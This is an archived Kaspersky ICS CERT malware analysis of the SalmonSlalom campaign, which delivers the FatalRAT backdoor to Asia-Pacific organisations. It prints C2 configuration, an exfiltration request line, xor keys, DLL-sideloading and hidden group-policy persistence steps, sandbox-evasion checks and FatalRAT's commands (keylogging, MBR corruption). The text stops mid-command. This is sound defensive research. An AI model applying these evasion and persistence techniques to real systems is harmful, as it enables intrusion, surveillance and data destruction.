{
	"id": "66a0d108-1197-4661-b8bc-352cec6ac60e",
	"created_at": "2026-04-06T01:30:46.207405Z",
	"updated_at": "2026-04-10T03:35:25.585649Z",
	"deleted_at": null,
	"sha1_hash": "e66c29589f2d77b18611624a8f1f7ac655ab133e",
	"title": "Operation SalmonSlalom | Kaspersky ICS CERT EN",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3310553,
	"plain_text": "Operation SalmonSlalom | Kaspersky ICS CERT EN\r\nBy Kaspersky ICS CERT Team\r\nPublished: 2025-02-23 · Archived: 2026-04-06 00:36:18 UTC\r\nA new attack targeting industrial organizations in APAC\r\nExecutive summary\r\nA Kaspersky ICS CERT investigation uncovered a cyberthreat specifically targeting various industrial organizations in\r\nthe Asia-Pacific region. The threat was orchestrated by attackers using legitimate Chinese cloud content delivery\r\nnetwork (CDN) myqcloud and the Youdao Cloud Notes service as part of their attack infrastructure. The attackers\r\nemployed a sophisticated multi-stage payload delivery framework to ensure evasion of detection. Their techniques\r\nincluded the use of a native file hosting CDN, publicly available packers for sample encryption, dynamic changes in\r\ncommand and control (C2) addresses, a CDN hosting the payload, and the use of DLL sideloading.\r\nWhile examining the code of the malicious artifacts, we noticed similarities to workflows observed in previous\r\ncampaigns orchestrated by threat actors using open-source remote access Trojans (RATs) such as Gh0st RAT,\r\nSimayRAT, Zegost, and FatalRAT. 
However, this campaign demonstrated a notable shift in tactics, techniques, and\r\nprocedures specifically tailored to Chinese-speaking targets.\r\nKaspersky ICS CERT called this attack campaign SalmonSlalom: the attackers challenged the cyberdefences like a\r\nsalmon navigates the cascading water while travelling upstream, losing their strength in maneuvering between sharp\r\nrocks.\r\nFor more information, please contact: ics-cert@kaspersky.com\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 1 of 37\n\nTechnical details\r\nBackground\r\nYoudao is a Chinese search engine and Youdao Cloud Notes, formerly known as Dao Notes, is an online database\r\ndesigned for individuals and teams, launched on June 28, 2011. Its versatile support spans multiple platforms,\r\nincluding client applications for personal computers (Windows and Mac), mobile (Android and IOS), and web. Thanks\r\nto its user-friendly interface and extensive multi-platform compatibility, it has garnered significant attention from\r\nChinese-speaking threat actors, who are increasingly utilizing it for malicious purposes.\r\nTo investigate this trend further, we conducted a search to identify all web pages associated with Youdao Cloud Notes\r\nthat have recently been reported for suspicious activity. 
Our findings indicate that a significant number of threat actors\r\nwere actively leveraging this service for their malicious activities.\r\nHowever, one intriguing case stood out because of an excessively long delivery framework, dynamic alterations of\r\nsubsequent payloads, extensive infrastructure, and the use of a legitimate binary’s function to spawn a child process.\r\nInitial infection\r\nKaspersky ICS CERT experts received information about a phishing campaign targeting government agencies and\r\nindustrial organizations in the Asia-Pacific region (Taiwan, Malaysia, China, Japan, Thailand, Hong Kong, South\r\nKorea, Singapore, the Philippines, Vietnam, etc.). In the course of our subsequent research, we found that as a result of\r\na complex multi-stage malware installation procedure, a backdoor class of malware, FatalRAT, is introduced into the\r\nsystem. Unlike another series of attacks described in an ESET report, the infection vector was not fake websites, but\r\nzip archives delivered via email, WeChat and Telegram.\r\nThe zip archives were disguised as invoices or legitimate tax filing applications for Chinese-speaking individuals and\r\ncontained the FatalRAT first-stage loader packed using AsProtect, UPX or NSPack to make detection and analysis\r\nmore difficult. Here are some examples of file names:\r\nOriginal file name Translated file name\r\n税前加计扣除新政指引.zip New policy guidelines for pre-tax super deductions.zip\r\n税务总局关于补贴有关税收的公\r\n告.zip\r\nAnnouncement of the State Administration of Taxation on Subsidy-related Taxes.zip\r\n年度企业所得税汇缴补税尽量安排\r\n在5月份入库.zip\r\nThe annual corporate income tax remittance and back tax should be\r\narranged to be deposited into the treasury in May as much as possible.zip\r\n关于企业单位调整增值税税率有关\r\n政策关于企业单位调整增值税税率\r\nRegarding the relevant policies for enterprise units to adjust the value-added tax rate. 
Regarding the relevant policies for enterprise units to\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 2 of 37\n\nOriginal file name Translated file name\r\n有关政策.zip adjust the value-added tax rate.zip\r\nIn this section we will look at the malware installation process, which, as we said, is complex and involves multiple\r\nsteps. The installation sequence is shown below:\r\nFig. 1 Infection chain\r\nFirst-stage loader\r\nWhile analyzing our telemetry data, we discovered that various first-stage loaders were being delivered as initial\r\naccess methods to deploy FatalRAT samples to Chinese-speaking targets.\r\nThe loaders we encountered are typically packed using UPX, AsPacker, or NSPack, and are unpacked at runtime. It\r\ncan be seen that the loader was compiled using Microsoft Visual C/C++ 2010. We were also able to clearly observe the\r\npresence of debug information in its string references, providing valuable insight into the threat actor’s environment:\r\nK:\\C++2010\\DLLrun\\DLLrunYoudao\\Release\\DLLrunYoudao.pdb\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 3 of 37\n\nUpon execution, the first-stage loader makes an HTTP request to Youdao Cloud Notes to download a dynamically\r\nupdated list of links to configurators (Before.dll) and second-stage loaders (Fangao.dll), for example:\r\nhttp://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae\r\nThe Youdao Cloud Notes returns a JSON response. The first few lines contain information about the note creation and\r\nmodification time, file name, size, followed by the next staged cloud storage location. The note structure was also\r\ndescribed in the K7 Security Labs report on the Sneaky SiMay RAT.\r\nFig. 
2 Dynamically updated list of links to next-stage modules\r\nThe first-stage loader parses the custom note structure and picks the first links to the configurator (Before.dll) and the\r\nsecond-stage loader (Fangao.dll). If the first links don’t work, the next ones will be selected.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 4 of 37\n\nFig. 3 Part of the first-stage loader responsible for parsing the custom Youdao note structure\r\nOnce downloaded, Fangao.dll and Before.dll will be loaded and executed by the first-stage loader.\r\nConfigurator (Before.dll)\r\nThis DLL has an export named Before and a PDB path with Chinese characters:\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\BEFORE.pdb\r\nThe project name from the path could be translated as “Van Gogh Remote Management Client No. 2”.\r\nImportant note: this malware module, as well as the final payload, requires configuration information to\r\noperate. During our research, we discovered several variants of Before.dll: with hardcoded configuration\r\ninformation, with dynamically updated configuration information and samples that combine static and\r\ndynamic approaches. Let’s consider the last option as the most complete.\r\nThe malware downloads the contents of another note from note.youdao[.]com to obtain configuration information, for\r\nexample:\r\nhttp[:]//note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 5 of 37\n\nFig. 4 The note content with dynamically updated malware configuration information\r\nThis note contains a JSON with three types of URLs: submit, dll and online. 
If the note is unavailable for some\r\nreason, for example, the URL is invalid, Before.dll will use the configuration information specified in its code.\r\nThe value of each parameter is encrypted using xor with key 0x58 and written to the configuration file\r\nC:\\Users\\Public\\vanconfig.ini. Here is an example of the encrypted contents of the FatalRAT configuration file:\r\n[data]\r\nsubmit=0,,(bwwihivkkvjlkvkib`j\r\ndll=0,,(bwwiiuiki`njjhmav;7+v9(u696216?v5!);47-\u003cv;75w v\u003c44\r\nbelong=jn\r\nonline=ivijvkoviikb`h`i\r\nAnd the decrypted version of this file:\r\n[data]\r\nsubmit=http://101.33.243[.]31:82\r\ndll=http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/xxx.dll\r\nbelong=26\r\nonline=1.12.37[.]113:8081\r\nAs you can see in Figure 4, the note has several sets of settings, most often several dozen at once. The malicious\r\nprogram checks the availability of the URL starting from the first block of settings and selects the first block that is\r\nfunctioning to save in the configuration file. The belong parameter refers to the block number in the note content that\r\nworked for this particular malware run attempt and can potentially allow the actors to track which of the URLs have\r\nalready been blocked by security solutions. Before.dll also generates a six-character random value that is used as a\r\nvictim ID. The generated value is saved in the C:\\Users\\Public\\history.txt file.\r\nAfter that, the configurator extracts a text document into the directory containing Before.dll; the text document receives\r\nthe same name as the malware DLL file, but with the extension .txt. Once created, the following text is written to the\r\nfile:\r\nFig. 
5 Lure document used by Before.dll\r\nThe document is a fake invoice that is opened by the malware to distract the user.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 7 of 37\n\nNote:\r\nThe contents of both custom Youdao Notes are updated on a regular basis. However, at the time of writing the\r\npage is no longer active.\r\nDuring our research we observed some of the servers mentioned above communicating with another malicious\r\nexecutable. We speculate that the same IP address may be used for different malicious campaigns.\r\nBefore.dll then collects the name and Windows version of the infected system and sends this information to the\r\nattacker’s server (as configured by the submit parameter provided in the note) in HTTP GET request parameters, for\r\nexample:\r\nhttp://101.33.243[.]31:82/initialsubmission?windows_version=17134\u0026computer_name=MYTEST:DESKTOP-CROB74D\r\nSecond-stage loader (Fangao.dll)\r\nThis DLL has one export named Fangao and a PDB path with Chinese characters:\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\FANGAO.pdb\r\nThe project folder name is the same as that for Before.dll, and we believe that this second-stage loader was compiled\r\nwith the configurator module.\r\nThis module uses a configuration file C:\\Users\\Public\\vanconfig.ini prepared by Before.dll.\r\nFangao.dll reads the submit URL parameter from the configuration file and, like Before.dll, sends information about\r\nthe infected system to the server: network name and operating system version. 
The page name initialsubmission is\r\nappended to the server address.\r\nAfter that, the malware performs a number of preparatory actions: it checks internet connections by attempting to\r\nconnect to the Chinese search engine Baidu.com, sets the hidden and system attributes to its executable file, and also\r\ncreates a mutex with the name UniqueMutexName.\r\nNext, the configuration file prepared by the Before.dll module is used again, but now the dll parameter is used.\r\nFangao.dll downloads the FatalRAT payload (dll.dll, for example, bcec6b78adb3cf966fab9025dacb0f05), decrypts it\r\nusing a seven-byte xor key specific to each loader sample (for example, 0xE8, 0xF4, 0x13, 0x2F, 0xE2, 0xBF, 0x6B)\r\nand runs FatalRAT.\r\nInterestingly, to distract the user’s attention, this module displays a window with a message about an alleged error in\r\nthe program, apparently so that the user does not wonder why he did not see the window of the legitimate program he\r\nwas running.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 8 of 37\n\nFig. 
6 The error message and the malware code that generates it\r\nThe message is displayed via a standard modal dialog window and contains a few typos that highlight the level of\r\ninaccuracy and carelessness demonstrated by the actors.\r\nThe malware conducts a series of checks to determine whether it is necessary to activate destructive activity on a given\r\nsystem, each check having its own identifier (name):\r\nCondition\r\nname (id)\r\nCondition description\r\nTwo:safe1\r\nThe files My Document.txt and My Document.xls are searched on the desktop; if any of the files\r\nis found, the check is considered as failed\r\nsafe2\r\nThe substring C:\\tmp is searched in the malware executable file path; if the substring is present, the\r\ncheck is considered as failed\r\nTwo:safe4 The file name is checked for special characters; if they are found, the check is considered as failed\r\nTwo:safe5\r\nIf the system localization language does not match any of the following:\r\nChinese (Hong Kong S.A.R.) 3076\r\nChinese (Macau S.A.R.) 
5124\r\nChinese (People’s Republic of China) 2052\r\nChinese (Singapore) 4100\r\nChinese (Taiwan) 1028, the check is considered as failed\r\nA check is made to see if the system’s time zone is set to UTC+8 (which includes many Asian\r\ncountries); if a different time zone is set, the check is considered as failed\r\nTwo:safe6 The malware obtains the registry key value\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\disk\\Enum\\0 and checks for\r\nthe presence of the vmware substring in the key value; if the substring is present, the check is\r\nconsidered as failed. This way the malware prevents destructive activity from running on virtual\r\nmachines\r\nIf any of the checks fail, the malware makes an HTTP GET request to the page \u003csubmitURL\u003e/submiterror?\r\nid=\u0026error_id=\u003cconditionName\u003e, where \u003csubmitURL\u003e is the submit server address taken from the configuration\r\nfile and \u003cconditionName\u003e is the name of the condition that failed. The malicious program then deliberately\r\ngenerates an exception and crashes.\r\nIf the checks are passed, Fangao.dll begins the process of unpacking the resources it contains. The unpacker utility\r\n(unrar.dll) is saved from resource 103 in the directory with the executable file of the malicious program, and its file is\r\nassigned the hidden and system attributes. 
The malware also creates two new folders: C:\\ProgramData\\KnGoe and\r\nC:\\ProgramData\\8877.\r\nThe resource with the name 101 is extracted and saved to the file C:\\ProgramData\\KnGoe\\PO520.rar, the resource\r\nwith the name 102 is extracted and saved to the file C:\\ProgramData\\KnGoe\\QD.rar and the resource with the name\r\n104 is extracted and saved to the file C:\\ProgramData\\KnGoe\\MMC.rar.\r\nOnce the archives are saved, Fangao.dll begins to extract files from them using unrar.dll mentioned above and the\r\npassword by2022. Below we provide detailed information about the unpacked files:\r\nArchive Destination path File description\r\nPO520.rar C:\\ProgramData\\KnGoe\\e.dll\r\nDDUtility.dll, part of legitimate DriverAssistant\r\nutility\r\nPO520.rar C:\\ProgramData\\KnGoe\\r.dll\r\nDMMUtility.dll, part of legitimate DriverAssistant\r\nutility\r\nPO520.rar C:\\ProgramData\\KnGoe\\t.dll wke.dll – sideloaded malicious DLL\r\nPO520.rar C:\\ProgramData\\KnGoe\\t.ini “MZ” header stored inside text file\r\nPO520.rar C:\\ProgramData\\KnGoe\\w.dll\r\nacvb.exe – executable file used for DLL\r\nsideloading (into the DriverAssistant process)\r\nQD.rar C:\\ProgramData\\KnGoe\\0user.exe Legitimate software, part of PureCodec\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 10 of 37\n\nArchive Destination path File description\r\nQD.rar C:\\ProgramData\\KnGoe\\update.ini PureCodec configuration file\r\nQD.rar C:\\ProgramData\\KnGoe\\YX.vbs Malicious VBS script\r\nQD.rar C:\\ProgramData\\KnGoe\\user.bat Malicious CMD script\r\nMMC.rar\r\nC:\\ProgramData\\8877\\Local Group Policy\r\nEditor.msc\r\nGroup policy editor in Chinese language\r\nFig. 
7 Fangao.dll resource unpacking scheme\r\nAfter unpacking, the archives are deleted and the malicious program searches for instances of the mmc.exe process\r\namong running programs and terminates them.\r\nThe malicious program checks for the existence of the registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Logon, which is\r\nnot present in the operating system by default, but is created if group policies specify scripts to execute when a user\r\nlogs on to the system. If the registry key exists, the malware assumes that persistence has already been established and\r\nexits – the legitimate cases where this approach is used to launch scripts at user logon are ignored by the actors\r\n(probably considered to be rare).\r\nIf the registry key does not exist, the malware attempts to create a persistence mechanism by simulating GUI\r\noperations (described below) with the help of the policy editor UI they brought. This approach means the actors don’t\r\nhave to mess with the UAC bypass – they get the rights they need by executing the legitimate and signed\r\nDriverAssistant tool (described later).\r\nUsing Windows Explorer, Fangao.dll opens the C:\\ProgramData\\8877 directory where the Chinese version of the\r\nGroup Policy Editor toolkit was previously unpacked. 
The opened Windows Explorer window is immediately hidden\r\nby a separate thread, and the malware sends messages to the hidden Windows Explorer window to emulate left clicks\r\nof the mouse, thus the malicious program launches the Group Policy Editor, simulating user actions via the GUI.\r\nThe window of the running Group Policy Editor is also hidden (using the SetWindowPos and EnableWindow API\r\nfunctions), after which the malicious program begins “navigating” inside the window. First, it selects the navigation\r\npanel on the left (highlighted in blue in Figure 8).\r\nNext, the malware interacts with the window by searching for the necessary elements by window class name and\r\nsending messages to it with WM_KEYDOWN and WM_KEYUP codes to simulate keystrokes. Using this GUI\r\ninteraction approach, Fangao.dll manages to navigate to the User Configuration → Windows Settings → Scripts\r\n(Logon/Logoff) section (Figure 8 – step 1), and create a group policy in the Logon subsection (Figure 8 – steps 2, 3)\r\npointing to the PureCodec application exploited in the attack (C:\\ProgramData\\KnGoe\\0user.exe).\r\nFig. 8 Malicious GUI actions carried out in a hidden Group Policy Editor window\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 12 of 37\n\nFig. 
9 Code for navigating via the GUI and sending keystrokes to the hidden window\r\nThis is how the second-stage loader ensures automatic launch of malware after user login by creating a new group\r\npolicy user logon script and specifying the path to the legitimate PureCodec application file as the program to execute\r\n(its use in the attack is described in the next section).\r\nTo make sure that the autorun procedure is successful, the malicious program checks once again whether the registry\r\nkey HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Logon is\r\npresent in the system, and if it is missing, the error “RegRunError” is sent to the standard output stream (stdout).\r\nThis completes the malware installation procedure and Fangao.dll launches C:\\ProgramData\\KnGoe\\0user.exe and\r\nthen terminates.\r\nMalware workflow\r\nIn this section we will look at the operating algorithm of the installed malware, which is also of particular interest. The\r\nthreat actor uses a black and white method where the actor leverages the functionality of legitimate binaries to make\r\nthe chain of events look like normal activity. The attackers also used a DLL sideloading technique to hide the\r\npersistence of the malware in legitimate process memory. The malware launch sequence is shown below:\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 13 of 37\n\nFig. 10 FatalRAT launch sequence\r\nExploitation of PureCodec (0user.exe)\r\n0user.exe is legitimate software. Its original name is PurePlayer.exe. 
The binary is part of the legitimate installer of\r\nPureCodec software that is distributed via various Chinese software distribution sites.\r\nThe legitimate 0user.exe binary would, under normal circumstances, load the update.ini configuration file and run the\r\nbinary specified as the path parameter in the update.ini file by performing the ShellExecuteExA Windows API call.\r\nPotPlayer.exe in a legitimate use case.\r\nIn this case, the threat actor manipulates the contents of update.ini to execute the next staged process: YX.vbs.\r\nFig. 11 Malicious version of update.ini\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 14 of 37\n\nFig. 12 Example of contents of legitimate update.ini\r\nMalicious scripts: YX.vbs and user.bat\r\nYX.vbs started by 0user.exe (PureCodec app) runs user.bat using wscript.shell.\r\nFig. 13 Contents of YX.vbs\r\nThen user.bat performs the following:\r\n1. Creates a new C:\\user0 directory\r\n2. Removes the C:\\test directory\r\n3. Checks if user0.exe is already running, and if so, kills it using taskill.exe\r\n4. Checks if the file C:\\ProgramData\\KnGoe\\w.dll exists; if it does, it adds the MZ header stored in\r\nC:\\ProgramData\\KnGoe\\t.ini to it as well as to three other files (C:\\ProgramData\\KnGoe\\e.dll,\r\nC:\\ProgramData\\KnGoe\\r.dll, C:\\ProgramData\\KnGoe\\t.dll) and saves them to the C:\\user0 folder under\r\nthe respective file names:\r\nSource path Destination path\r\nC:\\ProgramData\\KnGoe\\w.dll C:\\user0\\acvb.exe\r\nC:\\ProgramData\\KnGoe\\e.dll C:\\user0\\DDUtility.dll\r\nC:\\ProgramData\\KnGoe\\r.dll C:\\user0\\DMMUtility.dll\r\nC:\\ProgramData\\KnGoe\\t.dll C:\\user0\\wke.dll\r\n5. Sets the following attributes to C:\\user0 folder: read only, system, hidden and archived.\r\n6. Pings 127.0.0.1 (used to pause script execution).\r\n7. 
Runs C:\\user0\\acvb.exe (DriverAssistant tool).\r\n8. Pings 127.0.0.1 (used to pause script execution).\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 15 of 37\n\n9. Sets the following attributes to all files in the C:\\test folder: read only, system, hidden and archived.\r\n10. Retrieves the list of running processes using tasklist and finds the process running acvb.exe using findstr. If the\r\nprocess is not found, it returns to step 4.\r\n11. Sets the following attributes to C:\\ProgramData\\KnGoe\\YX.vbs: read only, system, hidden and archived.\r\n12. Sets the following attributes to files in the C:\\user0 folder: read only, system, hidden and archived.\r\nFig. 14 Contents of user.bat\r\nIt is worth noting that the script contains one commented out line:\r\n::@del “C:\\user0\\svchoet.exe” /AR /AH /AS /AA 2\u003enul\r\nIt is clear that the file C:\\user0\\svchoet.exe is attempting to masquerade as a system file and is most likely part of the\r\nattack being investigated, but during our research we were unable to find any other traces of this file being used.\r\nIt is also clear that the level of sophistication of the .bat file developer is low, as three of the four initial checks would\r\nnever run, and the script may run an obvious infinite loop in some of the possible deployment cases.\r\nExploitation of DriverAssistant (acvb.exe)\r\nThe acvb.exe binary is the DriverAssistant utility from a Chinese developer that helps install drivers on the machine.\r\nThe threat actor leverages acvb.exe, which is vulnerable to DLL sideloading. Launching DriverAssistant requires\r\nadministrator rights and, if not launched as a service, results in the UAC window being displayed. 
The three\r\nhighlighted libraries contain helper functions necessary for DriverAssistant, so these libraries are dropped to the disk.\r\nThreat actors opt to substitute any of the legitimate DLLs with a malicious DLL instead. During our research, we saw\r\ncases of DLL sideloading of other libraries among these three, highlighting the flexibility of the attacker in their choice\r\nof DLL replacement.\r\nFig. 15 Acvb.exe imported DLLs\r\nIn this case, DriverAssistant (acvb.exe) loads wke.dll, which was previously extracted from Fangao.dll resources with\r\nthe name t.dll, and calls its exported function wkeInit.\r\nThird-stage loader (wke.dll)\r\nThis DLL also contains debug information in its string references:\r\nK:\\C++\\DLL反射注入器四件套二号\\Release\\DLL运行器DLL版(wke.dll).pdb\r\nThis PDB path could be translated as “K:\\C++\\DLL reflective injector four-piece set No.\r\n2\\Release\\DLL runner DLL version (wke.dll).pdb”.\r\nwke.dll is packed using ASPacker, with a large number of null bytes appended to the end of the file to increase its size\r\nand make it bloated. It is unpacked in memory at runtime.\r\nWhen the DriverAssistant app loads this DLL and calls the exported wkeInit function, the malware code makes an\r\nHTTP GET request to a hardcoded URL, for example:\r\nhttp://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nDLL.dll is a FatalRAT payload described in the next section. 
The loaded library is not saved on disk, but is decrypted\r\nusing an xor operation and executed in memory.\r\nFinal payload – FatalRAT\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 17 of 37\n\nOther research groups, in particular LevelBlue (formerly AT\u0026T Security) and Antiy, described FatalRAT in detail, but\r\nKaspersky Threat Attribution Engine (KTAE) showed only a 73–76% code match with the described versions of\r\nFatalRAT, prompting us to describe a new version of this malware.\r\nFatalRAT performs 17 checks for an indicator that the malware executes in a virtual machine or sandbox environment,\r\nincluding some specific ones such as ThreatBook Cloud Sandbox.\r\nIf any of the checks fail, the malware stops executing. The malware also terminates all instances of the rundll32.exe\r\nprocess, which is also likely a measure to prevent malware analysis, since FatalRAT is a DLL that must be launched by\r\nmalware loaders, not a system utility.\r\nFatalRAT also blocks the ability to lock the computer by setting the registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation\r\nto 1.\r\nAlso, in a separate thread, FatalRAT starts intercepting keystrokes on the keyboard, i.e., launches a keylogger. The\r\nintercepted information is written to the file C:\\Windows\\Fatal.key. The malware decrypts hardcoded configuration\r\ndata using an algorithm identical to previous versions. However, in the case of the samples being analyzed, instead of\r\nthe malware’s command and control server, the hardcoded configuration data contains the IP address of Google\r\n(8.8.8.8):\r\nFig. 
16 FatalRAT decrypted strings\r\nThe malware then reads the online value from the C:\\Users\\Public\\vanconfig.ini configuration file created by\r\nBefore.dll and decrypts it using xor with the 0x58 key:\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 18 of 37\n\nFig. 17 FatalRAT external config loading and decryption routine\r\nThe server address and port from the online value of vanconfig.ini are used by FatalRAT to connect to the command\r\nand control server.\r\nDepending on the configuration, the malicious program can automatically launch itself on the infected system using a\r\nregistry key and a service. If this option is enabled, FatalRAT downloads its binary from the command and control\r\nserver and saves the downloaded buffer to the path C:\\Windows\\nw_elf.dll and sets it as a value to the registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7. 
If a service is created, its\r\nname and description are taken from the configuration data specified in the malware code.\r\nNext, FatalRAT collects information about the infected system and sends the collected information to the malware’s\r\ncommand and control server:\r\nExternal IP address (obtained using the http://www.taobao.com/help/getip.php service)\r\nOperating system installation time\r\nOperating system architecture and version\r\nInformation about malware service/registry key\r\nInformation about CPU\r\nInformation about whether the user is currently idle (no input events received for more than 180,000 ticks)\r\nUser name\r\nWhether the Tencent QQ messenger is running on the system (search by window class\r\nCTXOPConntion_Class)\r\nInformation about security solutions and other software running on the system; FatalRAT searches for the\r\nfollowing processes:\r\nProcess name Application\r\n360tray.exe 360 Total Security\r\navp.exe Kaspersky security solutions\r\nKvMonXP.exe Jiangmin security solutions\r\nRavMonD.exe Rising Antivirus\r\n360sd.exe Qihu 360 Internet Security\r\nMiner.exe Probably some type of cryptocurrency miner\r\negui.exe ESET Smart Security\r\nkxetray.exe, ksafe.exe Kingsoft applications\r\nTMBMSRV.exe Trend Micro Internet Security\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 19 of 37\n\nProcess name Application\r\navgui.exe AVG Internet Security\r\nashDisp.exe Avast Antivirus software\r\nMPMON.EXE Micropoint security solutions\r\navcenter.exe, arcavir.exe, agent.exe Avira security solutions\r\nspidernt.exe Dr.Web security solutions\r\nMcshield.exe McAfee VirusScan\r\nf-secure.exe F‑Secure security solutions\r\nccSvcHst.exe, ccSetMgr.exe Symantec security solutions\r\nauthfw.exe Authentium Firewall\r\nvsserv.exe Bitdefender Total Security\r\ncfp.exe COMODO security solutions\r\nF-PROT.exe F-Prot 
Antivirus\r\nguardxservice.exe – Ikarus security solutions\r\nmssecess.exe – Microsoft Security Essentials\r\nV3Svc.exe, patray.exe – AhnLab security solutions\r\nremupd.exe – Panda antivirus software\r\nalmon.exe – Sophos AutoUpdate Monitor\r\nAPASServ.exe – Sunbelt AutoPilot\r\nFortiTray.exe – Fortinet software\r\nNVCSched.exe – Norman Virus Control Scheduler\r\nQQPCRTP.exe – Tencent QQPCMgr\r\nBaiduSdSvc.exe – Baidu Antivirus\r\nqq.EXE – Tencent QQ\r\nyy.exe – xfplay\r\n9158.EXE – 9158chat\r\nCamfrog Video Chat.exe – Camfrog Video Chat\r\nmstsc.EXE – Windows remote desktop client\r\nAliIM.exe – TradeManager\r\nDUBrute.exe – DUBrute bruteforce tool\r\nNsvmon.npc – Naver Anti-Virus\r\nknsdtray.exe – Keniu Free Antivirus\r\nFTP.exe – Windows FTP client\r\nServUDaemon.exe – Serv-U FTP Server\r\nsafedog.exe – Safedog security solution\r\nQUHLPSVC.EXE – Quick Heal AntiVirus\r\ns.exe, 1433.exe – Unknown\r\nWhen all the data has been collected, the malware transfers it to the C2 server. The method of encrypting and decrypting traffic to the C2 server has not changed from the previous version of FatalRAT.\r\nFig. 
18 FatalRAT C2 request encryption routine\r\nNext, the malware waits for commands from the C2 server; the commands supported by the detected version of FatalRAT are listed below (command id – command description):\r\n0x6B – Runs the keylogger and sends collected data to the C2 server\r\n0x6C-0x71 – Command codes reserved for plugins\r\n0x7C – Executes one of the following subcommands:\r\n  0x7D – corrupt the Master Boot Record (MBR)\r\n  0x7E – open the CD\\DVD drive\r\n  0x7F – close the CD\\DVD drive\r\n  0x80 – show the Program Manager window\r\n  0x81 – hide the Program Manager window\r\n  0x82 – play monophonic sounds through the built-in speaker\r\n  0x83 – move running windows and play monophonic sounds through the built-in speaker 15 times\r\n  0x84 – turn off the screen\r\n  0x85 – turn on the screen\r\n  0x86 – hide the TaskBar\r\n  0x87 – show the TaskBar\r\n  0x88 – swap the left and right mouse buttons\r\n  0x89 – restore the mouse button actions\r\n0x8A – Sends data collected by the keylogger to the C2 server\r\n0x8C – Changes the screen resolution to 1600×900\r\n0x8E – Runs an application with the rights of another user\r\n0x8F – Finds and deletes user data in the Chrome browser (Chrome User Data)\r\n0x90 – Kills the explorer.exe process\r\n0x91 – Finds and deletes user data (cookies and history) in the Internet Explorer browser\r\n0x92 – Deletes the \\AppData\\Local\\Google\\Chrome\\User Data\\Default folder\r\n0x93 – Deletes the \\AppData\\Roaming\\Microsoft\\Skype for Desktop folder\r\n0x94 – Executes the del /s /f 
